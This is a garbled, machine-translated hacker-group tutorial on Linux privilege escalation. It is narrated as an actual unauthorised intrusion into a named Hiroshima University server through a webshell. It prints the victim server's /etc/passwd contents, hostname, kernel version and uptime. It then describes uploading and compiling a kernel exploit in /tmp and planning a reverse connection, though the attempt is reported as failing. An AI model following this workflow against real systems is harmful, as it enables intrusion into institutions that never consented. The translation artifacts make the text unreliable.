Some people have always thought that Elevation of Privilege in Linux is an advanced technology. In fact, Elevation of Privilege in Linux is not mysterious. To sum up the steps, you can simply divide them into five steps:
1. Obtain webshell
2. You have the permission to execute command line and obtain the Linux system version.
3. Upload the vulnerability elevation script corresponding to the Linux system version to the writable executable directory.
4. Execute the Privilege Escalation script and the bounce connection script.
5. remotely control the machine using command line
Author: YoCo Smart
From: Silic Group Hacker Army
Http://blackbap.org
The example used in this article is still the server of the Hiroshima University Institute, but so far I have not initiated the right, although it is not a successful example, however, the purpose of this article is to explain the process rather than the results.
The website Server SETUP environment of the Hiroshima University Institute is:
Cent OS + PHP + Apache + PsotgreSQL
Of course, this is not important. I have obtained webshell and found that I have permissions for exec and system functions.
First, read the password file: cat/etc/passwd
Copy the code to obtain: root: x: 0: 0: root:/bin/bash.
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Avahi: x: 70: 70: Avahi daemon: // sbin/nologin
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Distcache: x: 94: 94: Distcache: // sbin/nologin
S: x: 26: 26: PostgreSQL Server:/var/lib/pgsql:/bin/bash
Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin
Squid: x: 23: 23:/var/spool/squid:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Ope: x: 500: 500:/home/ope:/bin/bash
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Oprofile: x: 16: 16: Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
Avahi-autoipd: x: 100: 104: avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
In addition to root, the shell with bash permission has
Database account line32: postgres
The Administrator's account line36: ope
Apache is the shell of nologin. Of course, this does not seem to affect anything, just look at it.
By the way, 10:45:41 up 71 days, 1 user, load average: 2.00, 2.00, 2.00
User tty from login @ IDLE JCPU PCPU WHAT
Ope tty1-26Jan11 71 days 0.03 s 0.03 s-bash
Copy the code. Click Finish. Start Business
Run the command: uname-
Echo:
Linux XXXXXXXX.hiroshima-u.ac.jp 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686 i686 i386 GNU/Linux
Copy the kernel of code 2.6.18 and then look at lsb_release-.
Echo:
LSB Version: core-3.1-ia32: core-3.1-noarch: graphics-3.1-ia32: graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.4 (Final)
Release: 5.4
Codename: Final
The system that copies the code Cent OS 5.4 is indeed 2.6.18 kernel. However, no vulnerabilities have been found in this RedHat system --
Upload a privilege escalation script from 2.6.18 last year to the/tmp directory.
Note: Generally, the Elevation of Privilege scripts are stored in the/tmp directory. The reason is very simple. The directory is simple and executable ~ Name: 2618.c
Well, before permission escalation, This Is A c file and cannot be directly executed in the same way as rb or pl. We need to compile it first: gcc-o/tmp/2618/tmp/2618.c
Copy the code to compile/tmp/2618. c into a Executable File/tmp/2618.
Now you can directly execute this file/tmp/2618
Of course, the echo prompt fails to copy the code.
Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.
(See http://www.ksplice.com/uptrack/cve-2010-3081)
$ Kernel release: 2.6.18-164.15.1.el5PAE
$ Backdoor in LSM (1/3): checking... not present.
$ Backdoor in timer_list_fops (2/3): not available.
$ Backdoor in IDT (3/3): checking... not present.
Your system is free from the backdoors that wocould be left in memory
By the published exploit for CVE-2010-3081.
Of course, it is not wise to directly escalate the kernel privilege for the Linux System Version released by RedHat. My idea is to find software and drivers with vulnerabilities in the system and use them to escalate permissions. Unfortunately, I haven't succeeded yet --
Conclusion: There are two points to note in the Elevation of Privilege script. Compiling the gcc command cannot compile the script, which may be a problem in the c script itself. If the system cannot output executable files from gcc, it can be locally or elsewhere, and then directly transmitted to execute